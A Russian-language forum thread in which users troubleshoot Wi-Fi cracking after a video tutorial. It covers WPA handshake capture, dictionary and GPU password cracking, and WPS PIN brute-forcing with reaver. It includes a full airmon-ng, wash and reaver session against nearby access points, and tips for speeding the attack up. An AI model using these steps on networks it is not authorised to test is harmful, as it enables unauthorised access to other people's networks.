Взлом и защита Wi-Fi. Описание технологии.

[ksw1812]

Большое спасибо за ответ и особенно за Ваши видео!

Да, процессы, действительно есть, именно такие, как Вы отобразили. Можете подсказать: это процессы на КАКОМ ноутбуке - где Кали (он не подключен к сети) или на втором, который я пытался отследить?

Вообще-то у меня проблема в другом. В квартире есть интернет-розетка. Долгое время я подключался через кабель. Потом купил - по-моему, это маршрутизатор (вставляется в электророзетку и подсоединяется к интернет-кабелю). Беспроводная сеть автоматом называлась по имени маршрутизатора. Через некоторое время я ее переименовал и поставил новый пароль. Опять все нормально работает. Но в один прекрасный момент я вытащил маршрутизатор из розетки и отсоединил от кабеля. Парадокс (по крайне мере для меня) в том, что мой ноутбук по-прежнему в сети! Вот я и хочу узнать, что это за сеть, где источник сигнала? Я-то до сих по думал, что "сеть", которую я переименовал, это между моим ноутбуком и маршрутизатором, который через кабель подключен к интернету. Оказалось, что нет. Короче, как найти источник и что я в таком случае переименовал?

[DesignerMix]

это процессы на КАКОМ ноутбуке - где Кали (он не подключен к сети) или на втором, который я пытался отследить?

Естественно эти процессы на ноутбуке с Kali Linux.

А по поводу второго вопроса - рас вы подключены к Wi-Fi, а роутер ваш отключен, то очевидно что вы подключены к какому-то другому роутеру... Вариантов тут не много. Довольно странный вопрос. Подключите ваш роутер, подключитесь к нему кабелем и настройте Wi-Fi назначив сети уникальное имя и указав сложный пароль, так вы не запутаетесь.

[Арнольд]

Вопрос про оборудование, железо.
Подходит ли для сканирования эфира , устроиство "Точка доступа". Со своим блоком питания , и подсоединения к компу по проводу "Витая пара" ???
Например вот такои D-Link http://www.fcenter.ru/product/goods/125 ... 50Mbit_sek

USB- адаптер у меня есть, длины провода до компьютера не хватает

Каким адаптером лучше всетаки пользоваться

[DesignerMix]

Подходит ли для сканирования эфира , устроиство "Точка доступа". Со своим блоком питания , и подсоединения к компу по проводу "Витая пара" ???

Нет.

Каким адаптером лучше всетаки пользоваться

В первом сообщении темы есть ссылки на протестированные адаптеры. Можно выбрать из этих списков.

[desperados]

http://variable.pp.ua/%D1%81%D0%BB%D0%B ... awpa2-psk/ тут словарь не скачивается, нажимаю на скачать торрент ниче не происходит
http://variable.pp.ua/%D0%B3%D0%B5%D0%B ... 0%B0-wifi/ а у генератора ссылки тоже не робящие

[DesignerMix]

нажимаю на скачать торрент ниче не происходит

Большая ссыка "Торрент" это magnet-ссылка. Скачивать можно с помощью различных программ, например uTorrent нажав на кнопку Add Torrent From URL и вставив туда magnet-ссылку.

[desperados]

проблема на этапе 7:57 не получается получит хэндшейк

[DesignerMix]

desperados, скорее всего у вас есть какие-то системные процессы которые используют wi-fi адаптер. Завершите их перед выполнением всех действий. Более подробно я писал тут - viewtopic.php?p=6645#p6645

[desperados]

хз как указывать путь у словарю, если смотреть с винды, то он у меня находится в D:/brutwpa/Custom-WPA
сам Кали Линукс у мя на флешке (я не устанавливал, а просто записал образ,запускается через Live), а сам словарь на харде. Как путь будет выглядить в Кали Линукс что за раздел в линуксе /root?

Отправлено спустя 3 минуты 18 секунд:

desperados, скорее всего у вас есть какие-то системные процессы которые используют wi-fi адаптер. Завершите их перед выполнением всех действий. Более подробно я писал тут - viewtopic.php?p=6645#p6645

ну я спрашивал у чела, он сказал, что ESSID - это имя точки доступа и что Кали требует ввести это имя, ну хз ща то что вы сказали попробую

[gelikphoen]

Здравствуйте! Автору огромное спасибо за прекрасное изложение материала. Сейчас экспериментирую с вторым методом (подбор pin). Есть ряд вопросов. Сначала приведу свой лог.

root@kali:~# pkill NetworkManager
root@kali:~# pkill wpa_supplicant
root@kali:~# sleep 2
root@kali:~# ifconfig wlan
wlan0 Link encap:Ethernet HWaddr XX:XX:XX:XX:XX:XX
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

root@kali:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Atheros AR9285 ath9k - [phy0]
(monitor mode enabled on mon0)

root@kali:~# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
XX:3F:49:23:4A:XX 1 00 1.0 No network1
XX:C8:97:97:49:XX 1 00 1.0 No network2
XX:FE:ED:9F:28:XX 6 00 1.0 No network3

==#==

root@kali:~# reaver -i mon0 -b XX:3F:49:23:4A:XX -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:3F:49:23:4A:XX
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14


==#==
root@kali:~# reaver -i mon0 -b XX:C8:97:97:49:XX -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:C8:97:97:49:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:C8:97:97:49:XX (ESSID: network2)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

==#==
root@kali:~# reaver -i mon0 -b XX:FE:ED:9F:28:XX -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:FE:ED:9F:28:XX
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Associated with XX:FE:ED:9F:28:XX (ESSID: network3)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.02% complete @ 2015-05-31 21:08:18 (23 seconds/pin)
[+] Max time remaining at this rate: 70:15:54 (10998 pins left to try)
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 22225672
[+] Sending EAPOL START request

Вопросы:
1. Как ускорить процесс (долговато вроде 23 seconds/pin)? Зависит ли он от моего оборудования или от точки доступа?
2. Можно ли одновременно несколько точек проверять с одного компьютера?
3. Хочу написать простеньку прогу на c++ для автоматизации процесса. Если у кого есть готовый алгоритм или прога, буду благодарен если поделитесь.
4. Я так понимаю, команда "airmon-ng start wlan0" должна запускаться только один раз после включения kali linux? Или же каждый раз перед "wash -i mon0" и "reaver..."?
5. Почему у меня происходит "Switching mon0 to channel №"? Для чего это? И почему в результате этих переключение иногда так и не начинается процесс подбора?
6. Я так понял, по умолчанию на очень большом количестве модемов включен WPS (или QSS)?
7. "Receive timeout occurred" - это говорит о том, что пароль неверный или о потере пакетов?

Заранее благодарен за ответы! Понимаю, что вопросов слишком много)

[DesignerMix]

4. Я так понимаю, команда "airmon-ng start wlan0" должна запускаться только один раз после включения kali linux? Или же каждый раз перед "wash -i mon0" и "reaver..."?

Только один раз т.к. после перевода адаптера в режим мониторинга он будет в нем находится до перезагрузки либо до отключения этого режима вручную.

5. Почему у меня происходит "Switching mon0 to channel №"? Для чего это? И почему в результате этих переключение иногда так и не начинается процесс подбора?

Если вам известен канал атакуемой точки доступа, то вы можете его указать в параметрах этот номер добавив -c [номер_канала]. По умолчанию скрипт перебирает каналы сам в поисках точки доступа, но иногда, например из-за слабого сигнала, точка не обнаруживается именно с этим скорее всего и связана ваша проблема.

6. Я так понял, по умолчанию на очень большом количестве модемов включен WPS (или QSS)?

Да, но в современных точках доступа для полноценной работы WPS нужно физически нажать кнопку на корпусе точки доступа. Это сделано для защиты от подобных атак.

7. "Receive timeout occurred" - это говорит о том, что пароль неверный или о потере пакетов?

Я точно сказать не могу (практики очень мало), но в этой теме вроде как обсуждают обход подобного ограничения - http://dmyt.ru/forum/viewtopic.php?f=7&t=802

PS: Ответил только на те вопросы на которые смог. Я к сожалению (или к счастью) не имел большого опыта в подобных делах и не советую использовать знания для взлома и прочих нарушений закона. Но если вам интересна именно технология то я рад если мое видео было полезным и навело вас на какие-то мысли.

[gelikphoen]

6. Я так понял, по умолчанию на очень большом количестве модемов включен WPS (или QSS)?

Да, но в современных точках доступа для полноценной работы WPS нужно физически нажать кнопку на корпусе точки доступа. Это сделано для защиты от подобных атак.

То есть то, что в данной таблице http://prntscr.com/7c6wnl : Locked = No, еще не значит, что возможно подключение по пин коду? Другими словами, метод необязательно будет актуален для определенной точки доступа, даже если на ней по команде wash выдается Locked = No ?

[DesignerMix]

gelikphoen, получается так, ведь по сути WPS не отключен, а просто требует нажатия кнопки. Кстати не слежу за обновлением функционала для анализа - wash надо-бы посмотреть на changelog и изучить данный вопрос. Имейте ввиду что видео я снимал уже давно и много чего изменилось с тех пор.

[desperados]

кстати, если в reavere указать канал, то подбор будет быстрее
reaver -i mon0 -b МАК адресс -c канал

Отправлено спустя 3 минуты 42 секунды:
Дизайнер, можешь рассказать про AirSlax, что это как пользовать где и какой качать (я знаю с офиц сайта, но какой именно качать), можешь ответить на вопрос со словарём

[gelikphoen]

Дизайнер, можешь рассказать про AirSlax, что это как пользовать где и какой качать (я знаю с офиц сайта, но какой именно качать)

Может будет полезно, составил себе краткую инструкцию на будущее))):

Предварительные мероприятия с флешкой:
1. Для очистки флешки (если ранее, на ней ставился например backtrack)
http://paulov.ru/life/umenshilsya-obem- ... hto-delat/
2. Медленно отформатировать флешку в fat32

Установка AirSlax5_PRO
1. Качаем http://rutracker.org/forum/viewtopic.php?t=4788594
2. Смонтировать ISO (с помощью Daemon Tools можно, доступен там же на Rutracker)
3. Скопировать содержимое папки AirSlax5_PRO на флешку ( в корень флешки) (файловая система на флешке должна быть FAT16 или FAT32)
4. Зайти в папку boot и запустить программу установки (Есть версии для Windows и Linux). После этого флешка станет загрузочной.

Работа с AirSlax5_PRO
1. Загрузится с флешки.
2. Запустить AirPro с рабочего стола

Отправлено спустя 2 часа 12 минут 55 секунд:
И пару моих вопросов на данный момент:
1. В чем преимущества gpu перед cpu в контексте задачи подбора хеша пароля в перехваченном хендшейке?
2. Файл словаря по формату одинаков, как для CPU, так и для GPU метода перебора?
3. В ручном режиме ("Подбор WPA пароля") или режиме "Автопоиска и перехвата" можно ли сразу задать перебор по нескольким словарям? Или для этого нужно "слепить" из словарей один файл?
4. Поделитесь (или дайте ссылочку) на словарь популярных паролей. Подозреваю, что есть такие словари, в которые входят пароли, встречающиеся с наибольшей вероятностью. (При скачивании данных в первом посте словарей, у меня вместо скачивания выскакиевает куча рекламы, ткните носом если тупанул)))

[DesignerMix]

1. В чем преимущества gpu перед cpu в контексте задачи подбора хеша пароля в перехваченном хендшейке?

Почитайте эту статью - http://bits.media/GPU_vs._CPU_mining/

2. Файл словаря по формату одинаков, как для CPU, так и для GPU метода перебора?

Да

. В ручном режиме ("Подбор WPA пароля") или режиме "Автопоиска и перехвата" можно ли сразу задать перебор по нескольким словарям?

Можно запустить процесс перебора в нескольких окнах терминала одновременно, но при этом скорость соответственно будет разделена между всеми процессами.

При скачивании данных в первом посте словарей, у меня вместо скачивания выскакиевает куча рекламы

Там есть таблица внизу и по крайней мере у меня все скачивается... В таблице есть словарь hashkiller, в нем на мой взгляд качественная подборка т.к. есть много цифровых паролей и дат.

[gelikphoen]

Огромное спасибо за ответы. С меня должок!)

Посоветуйте, пожалуйста, программу для подбора хеша пароля (из уже перехваченного хендшейка) под винду.

Отправлено спустя 8 минут 19 секунд:
И никак не могу найти список видеокарт, которые поддерживаются программкой для перебора в airslax (HashCat), если сталкивались, подскажите плз, если нет буду искать) а то итак уже вопросами забросал)

[Александр Мартынов]

Доброго времени Уважаемые.подскажите скачал Kali-linux с официального сайта установил на VMware Workstation перехватил HandShake .вопрос какой путь к словарю ? и как добавить словари ?

[DesignerMix]

вопрос какой путь к словарю ? и как добавить словари ?

Ссылка на словари в первом посте. Путь до словаря будет ровно таким где будет лежать словарь... например если на рабочем столе, то путь /root/Desktop/имя_словаря.dic

[Александр Мартынов]

СПАСИБО !!! можно ещё вопросик я ещё про бывал AirSlax5_PRO установил на флешку перехватил HandShake в AirSlax5 встроены словари в папке dict под названием wl_1Gb в программе AirSlax5 его видна а запустить не могу почему ? и добавляю словари в эту папку прога их видит а не включает подбор может их надо как переименовывать ? за ранние спасибо !